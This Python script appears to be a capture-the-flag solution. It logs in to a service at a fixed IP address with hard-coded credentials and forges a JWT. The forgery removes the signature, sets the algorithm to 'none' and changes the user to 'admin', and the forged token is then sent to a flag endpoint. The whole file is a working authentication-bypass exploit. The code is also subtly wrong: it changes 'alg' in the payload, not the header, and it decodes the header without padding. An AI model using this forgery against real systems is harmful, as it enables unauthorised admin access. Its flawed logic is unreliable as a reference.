import requests
import json
import base64
import hmac
import hashlib

# Function to decode the payload part of a JWT
def decode_jwt(payload):
    # Decode the JWT payload from base64
    padding = "=" * (4 - len(payload) % 4)  # Add padding if necessary
    payload_decoded = base64.urlsafe_b64decode(payload + padding).decode('utf-8')
    return json.loads(payload_decoded)

# Function to create a modified JWT
def create_modified_jwt(header, payload):
    # Create a JWT version without a signature
    header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode('utf-8')).decode('utf-8').rstrip("=")
    payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode('utf-8')).decode('utf-8').rstrip("=")
    return f"{header_b64}.{payload_b64}."

# URLs for login and flag
base_url = "http://34.131.133.224:9999/"
login_url = "http://34.131.133.224:9999/login"
flag_url = "http://34.131.133.224:9999/flag"

# Login data (user and password)
login_data = {
    "user": "mH4ck3r0n3",
    "pass": "mH4ck3r0n3"
}

# Send the login request
response = requests.post(login_url, json=login_data)
token = response.json().get("token")
# Split the token into its 3 parts: header, payload, signature
header_b64, payload_b64, signature_b64 = token.split(".")
# Decode the payload (middle part of the JWT)
payload = decode_jwt(payload_b64)
# Modify the payload: change "alg" to "none" and "user" to "admin"
payload["alg"] = "none"
payload["user"] = "admin"
# Create the new JWT without a signature (signature part omitted)
new_token = create_modified_jwt(json.loads(base64.urlsafe_b64decode(header_b64).decode("utf-8")), payload)

print("\nFLAG: " + requests.post(flag_url, json={"token": new_token}).text)
